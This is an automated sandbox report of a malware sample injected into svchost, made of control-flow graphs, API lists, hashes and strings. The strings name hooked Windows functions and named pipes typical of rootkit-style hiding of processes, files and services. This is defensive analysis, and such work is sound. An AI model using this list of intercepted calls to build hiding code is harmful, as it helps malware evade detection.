                                                                                                                            control_flow_graph 110 23af32b273c-23af32b27a4 call 23af32b29d4 * 4 119 23af32b29b2 110->119 120 23af32b27aa-23af32b27ad 110->120 122 23af32b29b4-23af32b29d0 119->122 120->119 121 23af32b27b3-23af32b27b6 120->121 121->119 123 23af32b27bc-23af32b27bf 121->123 123->119 124 23af32b27c5-23af32b27e6 123->124 124->119 126 23af32b27ec-23af32b280c 124->126 127 23af32b2838-23af32b283f 126->127 128 23af32b280e-23af32b2836 126->128 129 23af32b2845-23af32b2852 127->129 130 23af32b28df-23af32b28e6 127->130 128->127 128->128 129->130 133 23af32b2858-23af32b286a LoadLibraryA 129->133 131 23af32b2992-23af32b29b0 130->131 132 23af32b28ec-23af32b2901 130->132 131->122 132->131 134 23af32b2907 132->134 135 23af32b286c-23af32b2878 133->135 136 23af32b28ca-23af32b28d2 133->136 140 23af32b290d-23af32b2921 134->140 137 23af32b28c5-23af32b28c8 135->137 136->133 138 23af32b28d4-23af32b28d9 136->138 137->136 141 23af32b287a-23af32b287d 137->141 138->130 142 23af32b2923-23af32b2934 140->142 143 23af32b2982-23af32b298c 140->143 144 23af32b28a7-23af32b28b7 141->144 145 23af32b287f-23af32b28a5 141->145 147 23af32b2936-23af32b293d 142->147 148 23af32b293f-23af32b2943 142->148 143->131 143->140 151 23af32b28ba-23af32b28c1 144->151 145->151 152 23af32b2970-23af32b2980 147->152 149 23af32b2945-23af32b294b 148->149 150 23af32b294d-23af32b2951 148->150 149->152 153 23af32b2963-23af32b2967 150->153 154 23af32b2953-23af32b2961 150->154 151->137 152->142 152->143 153->152 156 23af32b2969-23af32b296c 153->156 154->152 156->152
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1029625771-0
                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction ID: 3da15631c9552bda4809b53278dd1c51c7a8308e220c86789214b26559236580
                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction Fuzzy Hash: 3861FF32B01B9087EB588F15900872DB3A2FB64BA4F688135DE9D07BC8DB3DE952C711

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 363 23af32e2b2c-23af32e2ba5 call 23af3302ce0 366 23af32e2ee0-23af32e2f03 363->366 367 23af32e2bab-23af32e2bb1 363->367 367->366 368 23af32e2bb7-23af32e2bba 367->368 368->366 369 23af32e2bc0-23af32e2bc3 368->369 369->366 370 23af32e2bc9-23af32e2bd9 GetModuleHandleA 369->370 371 23af32e2bed 370->371 372 23af32e2bdb-23af32e2beb call 23af32f6090 370->372 374 23af32e2bf0-23af32e2c0e 371->374 372->374 374->366 377 23af32e2c14-23af32e2c33 StrCmpNIW 374->377 377->366 378 23af32e2c39-23af32e2c3d 377->378 378->366 379 23af32e2c43-23af32e2c4d 378->379 379->366 380 23af32e2c53-23af32e2c5a 379->380 380->366 381 23af32e2c60-23af32e2c73 380->381 382 23af32e2c75-23af32e2c81 381->382 383 23af32e2c83 381->383 384 23af32e2c86-23af32e2c8a 382->384 383->384 385 23af32e2c8c-23af32e2c98 384->385 386 23af32e2c9a 384->386 387 23af32e2c9d-23af32e2ca7 385->387 386->387 388 23af32e2d9d-23af32e2da1 387->388 389 23af32e2cad-23af32e2cb0 387->389 390 23af32e2da7-23af32e2daa 388->390 391 23af32e2ed2-23af32e2eda 388->391 392 23af32e2cc2-23af32e2ccc 389->392 393 23af32e2cb2-23af32e2cbf call 23af32e199c 389->393 396 23af32e2dac-23af32e2db8 call 23af32e199c 390->396 397 23af32e2dbb-23af32e2dc5 390->397 391->366 391->381 394 23af32e2d00-23af32e2d0a 392->394 395 23af32e2cce-23af32e2cdb 392->395 393->392 401 23af32e2d0c-23af32e2d19 394->401 402 23af32e2d3a-23af32e2d3d 394->402 395->394 400 23af32e2cdd-23af32e2cea 395->400 396->397 404 23af32e2dc7-23af32e2dd4 397->404 405 23af32e2df5-23af32e2df8 397->405 408 23af32e2ced-23af32e2cf3 400->408 401->402 409 23af32e2d1b-23af32e2d28 401->409 410 23af32e2d3f-23af32e2d49 call 23af32e1bbc 402->410 411 23af32e2d4b-23af32e2d58 lstrlenW 402->411 404->405 413 23af32e2dd6-23af32e2de3 404->413 406 23af32e2e05-23af32e2e12 lstrlenW 405->406 407 23af32e2dfa-23af32e2e03 call 23af32e1bbc 405->407 420 23af32e2e14-23af32e2e1e 406->420 421 23af32e2e35-23af32e2e3f call 23af32e3844 406->421 407->406 426 23af32e2e4a-23af32e2e55 407->426 418 23af32e2cf9-23af32e2cfe 408->418 419 23af32e2d93-23af32e2d98 408->419 422 23af32e2d2b-23af32e2d31 409->422 410->411 410->419 414 23af32e2d5a-23af32e2d64 411->414 415 23af32e2d7b-23af32e2d8d call 23af32e3844 411->415 416 23af32e2de6-23af32e2dec 413->416 414->415 424 23af32e2d66-23af32e2d79 call 23af32e152c 414->424 415->419 429 23af32e2e42-23af32e2e44 415->429 425 23af32e2dee-23af32e2df3 416->425 416->426 418->394 418->408 419->429 420->421 430 23af32e2e20-23af32e2e33 call 23af32e152c 420->430 421->429 422->419 431 23af32e2d33-23af32e2d38 422->431 424->415 424->419 425->405 425->416 434 23af32e2e57-23af32e2e5b 426->434 435 23af32e2ecc-23af32e2ed0 426->435 429->391 429->426 430->421 430->426 431->402 431->422 440 23af32e2e63-23af32e2e7d call 23af32e85c0 434->440 441 23af32e2e5d-23af32e2e61 434->441 435->391 444 23af32e2e80-23af32e2e83 440->444 441->440 441->444 447 23af32e2ea6-23af32e2ea9 444->447 448 23af32e2e85-23af32e2ea3 call 23af32e85c0 444->448 447->435 450 23af32e2eab-23af32e2ec9 call 23af32e85c0 447->450 448->447 450->435
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction ID: 98dc20d53b9ffa1a8ca992e3ea5a6f8ebec1cdeae552b08220cceac7e5cea71a
                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction Fuzzy Hash: 0AB1926221075082EB5CEF25D4497A9A3A9FB64B84F445036DE8A53FD4DF3EDE80C781
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3140674995-0
                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction ID: f80704e4090aec457dd619ddbf93a46e313ac98ba8684ae4ab85bc3349a4acc6
                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction Fuzzy Hash: 48315D72305B808AEB649F64E8447ED7368F794B44F44402ADA8D57B98EF3DC648CB10
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1239891234-0
                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction ID: 9624eecabc732b79e81a6373d390755405d02b5869d1bd8e9f427c0fee0c5b47
                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction Fuzzy Hash: A6317E32214B808AEB64CF25E84539E73A8FB99B54F500126EADD43F98DF3DC695CB01

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction ID: 44ec96c4dca53712827799cb354bea119c19488123cee649313871abe28699f2
                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction Fuzzy Hash: 49516C76200B8486EB58DF62E44835EB7A5F798F89F044134DE8A07B98DF3EC249CB01

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction ID: de7cba9eaa82766f2ac71d34862b1f30ad60a327fc8075d0386d60777f2da56b
                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction Fuzzy Hash: 9E31AEA4210A4AA0EB08EF65E85A7D4A324BB24744F84513394D942DEADF7FC389D793

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 205 23af32b6910-23af32b6916 206 23af32b6918-23af32b691b 205->206 207 23af32b6951-23af32b695b 205->207 209 23af32b6945-23af32b6984 call 23af32b6fc0 206->209 210 23af32b691d-23af32b6920 206->210 208 23af32b6a78-23af32b6a8d 207->208 214 23af32b6a9c-23af32b6ab6 call 23af32b6e54 208->214 215 23af32b6a8f 208->215 228 23af32b6a52 209->228 229 23af32b698a-23af32b699f call 23af32b6e54 209->229 212 23af32b6922-23af32b6925 210->212 213 23af32b6938 __scrt_dllmain_crt_thread_attach 210->213 219 23af32b6927-23af32b6930 212->219 220 23af32b6931-23af32b6936 call 23af32b6f04 212->220 217 23af32b693d-23af32b6944 213->217 226 23af32b6ab8-23af32b6aed call 23af32b6f7c call 23af32b6e1c call 23af32b7318 call 23af32b7130 call 23af32b7154 call 23af32b6fac 214->226 227 23af32b6aef-23af32b6b20 call 23af32b7190 214->227 221 23af32b6a91-23af32b6a9b 215->221 220->217 226->221 237 23af32b6b22-23af32b6b28 227->237 238 23af32b6b31-23af32b6b37 227->238 232 23af32b6a54-23af32b6a69 228->232 240 23af32b69a5-23af32b69b6 call 23af32b6ec4 229->240 241 23af32b6a6a-23af32b6a77 call 23af32b7190 229->241 237->238 242 23af32b6b2a-23af32b6b2c 237->242 243 23af32b6b39-23af32b6b43 238->243 244 23af32b6b7e-23af32b6b94 call 23af32b268c 238->244 259 23af32b69b8-23af32b69dc call 23af32b72dc call 23af32b6e0c call 23af32b6e38 call 23af32bac0c 240->259 260 23af32b6a07-23af32b6a11 call 23af32b7130 240->260 241->208 248 23af32b6c1f-23af32b6c2c 242->248 249 23af32b6b45-23af32b6b4d 243->249 250 23af32b6b4f-23af32b6b5d call 23af32c5780 243->250 262 23af32b6b96-23af32b6b98 244->262 263 23af32b6bcc-23af32b6bce 244->263 256 23af32b6b63-23af32b6b78 call 23af32b6910 249->256 250->256 272 23af32b6c15-23af32b6c1d 250->272 256->244 256->272 259->260 308 23af32b69de-23af32b69e5 __scrt_dllmain_after_initialize_c 259->308 260->228 281 23af32b6a13-23af32b6a1f call 23af32b7180 260->281 262->263 269 23af32b6b9a-23af32b6bbc call 23af32b268c call 23af32b6a78 262->269 270 23af32b6bd5-23af32b6bea call 23af32b6910 263->270 271 23af32b6bd0-23af32b6bd3 263->271 269->263 302 23af32b6bbe-23af32b6bc6 call 23af32c5780 269->302 270->272 290 23af32b6bec-23af32b6bf6 270->290 271->270 271->272 272->248 292 23af32b6a45-23af32b6a50 281->292 293 23af32b6a21-23af32b6a2b call 23af32b7098 281->293 296 23af32b6bf8-23af32b6bff 290->296 297 23af32b6c01-23af32b6c11 call 23af32c5780 290->297 292->232 293->292 307 23af32b6a2d-23af32b6a3b 293->307 296->272 297->272 302->263 307->292 308->260 309 23af32b69e7-23af32b6a04 call 23af32babc8 308->309 309->260
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: aa7523ff3450d8138d324d1415d18bdd61c465b0ca31d792af1584c48e49331f
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: 0281BF2170064186FB5CAB66944D35962A0FBB5B80F5880359AC987FE7DF3FCB868743

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 0000023AF32ECE37
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECE4C
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECE6D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECE9A
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECEAB
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECEBC
                                                                                                                            • SetLastError.KERNEL32 ref: 0000023AF32ECED7
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECF0D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,0000023AF32EECCC,?,?,?,?,0000023AF32EBF9F,?,?,?,?,?,0000023AF32E7AB0), ref: 0000023AF32ECF2C
                                                                                                                              • Part of subcall function 0000023AF32ED6CC: HeapAlloc.KERNEL32 ref: 0000023AF32ED721
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECF54
                                                                                                                              • Part of subcall function 0000023AF32ED744: HeapFree.KERNEL32 ref: 0000023AF32ED75A
                                                                                                                              • Part of subcall function 0000023AF32ED744: GetLastError.KERNEL32 ref: 0000023AF32ED764
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECF65
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000023AF32F0A6B,?,?,?,0000023AF32F045C,?,?,?,0000023AF32EC84F), ref: 0000023AF32ECF76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 570795689-0
                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction ID: 4f1da59daabb27cd6b0dd6ca2d60cef7b0ed2b74a20c8addae82343016ffbeb4
                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction Fuzzy Hash: 52419D6060025446FB6CA3B9554F369B24A5F647B4F184734E8F606EEADE3EDBC18203

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction ID: a8d4ddb08ab43e39ca41348e59499764ae55964e0db52882bde19170e5b30b0e
                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction Fuzzy Hash: 84213D3261475083EB14DB25E54875A67A4F799BA4F500225EA9A03FE8CF3DC249CF01

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 584 23af32ea544-23af32ea5ac call 23af32eb414 587 23af32ea5b2-23af32ea5b5 584->587 588 23af32eaa13-23af32eaa1b call 23af32ec748 584->588 587->588 590 23af32ea5bb-23af32ea5c1 587->590 591 23af32ea5c7-23af32ea5cb 590->591 592 23af32ea690-23af32ea6a2 590->592 591->592 596 23af32ea5d1-23af32ea5dc 591->596 594 23af32ea6a8-23af32ea6ac 592->594 595 23af32ea963-23af32ea967 592->595 594->595 597 23af32ea6b2-23af32ea6bd 594->597 599 23af32ea969-23af32ea970 595->599 600 23af32ea9a0-23af32ea9aa call 23af32e9634 595->600 596->592 598 23af32ea5e2-23af32ea5e7 596->598 597->595 601 23af32ea6c3-23af32ea6ca 597->601 598->592 602 23af32ea5ed-23af32ea5f7 call 23af32e9634 598->602 599->588 603 23af32ea976-23af32ea99b call 23af32eaa1c 599->603 600->588 613 23af32ea9ac-23af32ea9cb call 23af32e7940 600->613 605 23af32ea894-23af32ea8a0 601->605 606 23af32ea6d0-23af32ea707 call 23af32e9a10 601->606 602->613 617 23af32ea5fd-23af32ea628 call 23af32e9634 * 2 call 23af32e9d24 602->617 603->600 605->600 610 23af32ea8a6-23af32ea8aa 605->610 606->605 621 23af32ea70d-23af32ea715 606->621 614 23af32ea8ac-23af32ea8b8 call 23af32e9ce4 610->614 615 23af32ea8ba-23af32ea8c2 610->615 614->615 628 23af32ea8db-23af32ea8e3 614->628 615->600 620 23af32ea8c8-23af32ea8d5 call 23af32e98b4 615->620 652 23af32ea648-23af32ea652 call 23af32e9634 617->652 653 23af32ea62a-23af32ea62e 617->653 620->600 620->628 626 23af32ea719-23af32ea74b 621->626 630 23af32ea887-23af32ea88e 626->630 631 23af32ea751-23af32ea75c 626->631 633 23af32ea8e9-23af32ea8ed 628->633 634 23af32ea9f6-23af32eaa12 call 23af32e9634 * 2 call 23af32ec6a8 628->634 630->605 630->626 631->630 635 23af32ea762-23af32ea77b 631->635 637 23af32ea900 633->637 638 23af32ea8ef-23af32ea8fe call 23af32e9ce4 633->638 634->588 639 23af32ea874-23af32ea879 635->639 640 23af32ea781-23af32ea7c6 call 23af32e9cf8 * 2 635->640 648 23af32ea903-23af32ea90d call 23af32eb4ac 637->648 638->648 644 23af32ea884 639->644 668 23af32ea7c8-23af32ea7ee call 23af32e9cf8 call 23af32eac38 640->668 669 23af32ea804-23af32ea80a 640->669 644->630 648->600 660 23af32ea913-23af32ea961 call 23af32e9944 call 23af32e9b50 648->660 652->592 667 23af32ea654-23af32ea674 call 23af32e9634 * 2 call 23af32eb4ac 652->667 653->652 659 23af32ea630-23af32ea63b 653->659 659->652 664 23af32ea63d-23af32ea642 659->664 660->600 664->588 664->652 690 23af32ea676-23af32ea680 call 23af32eb59c 667->690 691 23af32ea68b 667->691 684 23af32ea815-23af32ea872 call 23af32ea470 668->684 685 23af32ea7f0-23af32ea802 668->685 673 23af32ea80c-23af32ea810 669->673 674 23af32ea87b 669->674 673->640 678 23af32ea880 674->678 678->644 684->678 685->668 685->669 694 23af32ea686-23af32ea9ef call 23af32e92ac call 23af32eaff4 call 23af32e94a0 690->694 695 23af32ea9f0-23af32ea9f5 call 23af32ec6a8 690->695 691->592 694->695 695->634
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324309459.0000023AF32E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32e0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction ID: b4d8cd867aaeb3ad171d14d2f9034518e5dc5eb0835e7de6886729e79cec17f7
                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction Fuzzy Hash: 76E17D726047808AEB28DF65D48A39DB7A8FB65798F100126EEC957F95CB3DC6C1C702

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 463 23af32b9944-23af32b99ac call 23af32ba814 466 23af32b9e13-23af32b9e1b call 23af32bbb48 463->466 467 23af32b99b2-23af32b99b5 463->467 467->466 468 23af32b99bb-23af32b99c1 467->468 470 23af32b99c7-23af32b99cb 468->470 471 23af32b9a90-23af32b9aa2 468->471 470->471 475 23af32b99d1-23af32b99dc 470->475 473 23af32b9d63-23af32b9d67 471->473 474 23af32b9aa8-23af32b9aac 471->474 478 23af32b9d69-23af32b9d70 473->478 479 23af32b9da0-23af32b9daa call 23af32b8a34 473->479 474->473 476 23af32b9ab2-23af32b9abd 474->476 475->471 477 23af32b99e2-23af32b99e7 475->477 476->473 481 23af32b9ac3-23af32b9aca 476->481 477->471 482 23af32b99ed-23af32b99f7 call 23af32b8a34 477->482 478->466 483 23af32b9d76-23af32b9d9b call 23af32b9e1c 478->483 479->466 489 23af32b9dac-23af32b9dcb call 23af32b6d40 479->489 485 23af32b9c94-23af32b9ca0 481->485 486 23af32b9ad0-23af32b9b07 call 23af32b8e10 481->486 482->489 497 23af32b99fd-23af32b9a28 call 23af32b8a34 * 2 call 23af32b9124 482->497 483->479 485->479 490 23af32b9ca6-23af32b9caa 485->490 486->485 501 23af32b9b0d-23af32b9b15 486->501 494 23af32b9cac-23af32b9cb8 call 23af32b90e4 490->494 495 23af32b9cba-23af32b9cc2 490->495 494->495 507 23af32b9cdb-23af32b9ce3 494->507 495->479 500 23af32b9cc8-23af32b9cd5 call 23af32b8cb4 495->500 531 23af32b9a48-23af32b9a52 call 23af32b8a34 497->531 532 23af32b9a2a-23af32b9a2e 497->532 500->479 500->507 505 23af32b9b19-23af32b9b4b 501->505 509 23af32b9c87-23af32b9c8e 505->509 510 23af32b9b51-23af32b9b5c 505->510 512 23af32b9ce9-23af32b9ced 507->512 513 23af32b9df6-23af32b9e12 call 23af32b8a34 * 2 call 23af32bbaa8 507->513 509->485 509->505 510->509 514 23af32b9b62-23af32b9b7b 510->514 518 23af32b9d00 512->518 519 23af32b9cef-23af32b9cfe call 23af32b90e4 512->519 513->466 520 23af32b9c74-23af32b9c79 514->520 521 23af32b9b81-23af32b9bc6 call 23af32b90f8 * 2 514->521 527 23af32b9d03-23af32b9d0d call 23af32ba8ac 518->527 519->527 523 23af32b9c84 520->523 544 23af32b9c04-23af32b9c0a 521->544 545 23af32b9bc8-23af32b9bee call 23af32b90f8 call 23af32ba038 521->545 523->509 527->479 542 23af32b9d13-23af32b9d61 call 23af32b8d44 call 23af32b8f50 527->542 531->471 548 23af32b9a54-23af32b9a74 call 23af32b8a34 * 2 call 23af32ba8ac 531->548 532->531 536 23af32b9a30-23af32b9a3b 532->536 536->531 541 23af32b9a3d-23af32b9a42 536->541 541->466 541->531 542->479 552 23af32b9c0c-23af32b9c10 544->552 553 23af32b9c7b 544->553 563 23af32b9c15-23af32b9c72 call 23af32b9870 545->563 564 23af32b9bf0-23af32b9c02 545->564 569 23af32b9a76-23af32b9a80 call 23af32ba99c 548->569 570 23af32b9a8b 548->570 552->521 554 23af32b9c80 553->554 554->523 563->554 564->544 564->545 573 23af32b9a86-23af32b9def call 23af32b86ac call 23af32ba3f4 call 23af32b88a0 569->573 574 23af32b9df0-23af32b9df5 call 23af32bbaa8 569->574 570->471 573->574 574->513
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000002E.00000002.3324067939.0000023AF32B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000023AF32B0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_46_2_23af32b0000_svchost.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction ID: 5cd99f4a483f263c615ceea0efd3ddc411abd48ac49001fa3fe7c477d7fb9094
                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
